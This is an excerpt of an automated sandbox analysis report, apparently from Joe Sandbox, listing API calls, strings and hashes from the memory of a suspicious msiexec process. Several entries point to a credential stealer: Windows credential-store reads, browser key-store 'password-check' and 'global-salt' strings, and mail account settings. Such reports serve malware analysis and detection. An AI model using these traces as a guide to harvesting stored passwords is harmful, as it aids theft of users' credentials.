                                                                                • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004091EC
                                                                                • sprintf.MSVCRT ref: 00409201
                                                                                  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                • String ID: caption$dialog_%d
                                                                                • API String ID: 2923679083-4161923789
                                                                                • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                • memset.MSVCRT ref: 00410246
                                                                                • memset.MSVCRT ref: 00410258
                                                                                  • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                • memset.MSVCRT ref: 0041033F
                                                                                • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                • String ID:
                                                                                • API String ID: 3974772901-0
                                                                                • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 0044406C
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                • strlen.MSVCRT ref: 004440D1
                                                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                • String ID:
                                                                                • API String ID: 577244452-0
                                                                                • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                APIs
                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                • _strcmpi.MSVCRT ref: 00404518
                                                                                • _strcmpi.MSVCRT ref: 00404536
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _strcmpi$memcpystrlen
                                                                                • String ID: imap$pop3$smtp
                                                                                • API String ID: 2025310588-821077329
                                                                                • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C02D
                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                • API String ID: 2726666094-3614832568
                                                                                • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                APIs
                                                                                • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                  • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp$memcpy
                                                                                • String ID: global-salt$password-check
                                                                                • API String ID: 231171946-3927197501
                                                                                • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                • EndPaint.USER32(?,?), ref: 004016F3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                • String ID:
                                                                                • API String ID: 19018683-0
                                                                                • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040644F
                                                                                • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                  • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID:
                                                                                • API String ID: 438689982-0
                                                                                • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                APIs
                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                • strlen.MSVCRT ref: 0040F7BE
                                                                                • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                • String ID: Passport.Net\*
                                                                                • API String ID: 2329438634-3671122194
                                                                                • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                APIs
                                                                                  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                • memset.MSVCRT ref: 0040330B
                                                                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                • strchr.MSVCRT ref: 0040335A
                                                                                  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                • strlen.MSVCRT ref: 0040339C
                                                                                  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                • String ID: Personalities
                                                                                • API String ID: 2103853322-4287407858
                                                                                • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: H
                                                                                • API String ID: 2221118986-2852464175
                                                                                • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                • API String ID: 3510742995-3170954634
                                                                                • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: winWrite1$winWrite2
                                                                                • API String ID: 438689982-3457389245
                                                                                • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: winRead
                                                                                • API String ID: 1297977491-2759563040
                                                                                • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0044955B
                                                                                • memset.MSVCRT ref: 0044956B
                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: gj
                                                                                • API String ID: 1297977491-4203073231
                                                                                • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                • String ID:
                                                                                • API String ID: 1189762176-0
                                                                                • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 004090C2
                                                                                • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                • String ID:
                                                                                • API String ID: 4247780290-0
                                                                                • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                APIs
                                                                                  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                • String ID:
                                                                                • API String ID: 2775283111-0
                                                                                • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                APIs
                                                                                • _strcmpi.MSVCRT ref: 0040E134
                                                                                • _strcmpi.MSVCRT ref: 0040E14D
                                                                                • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _strcmpi$_mbscpy
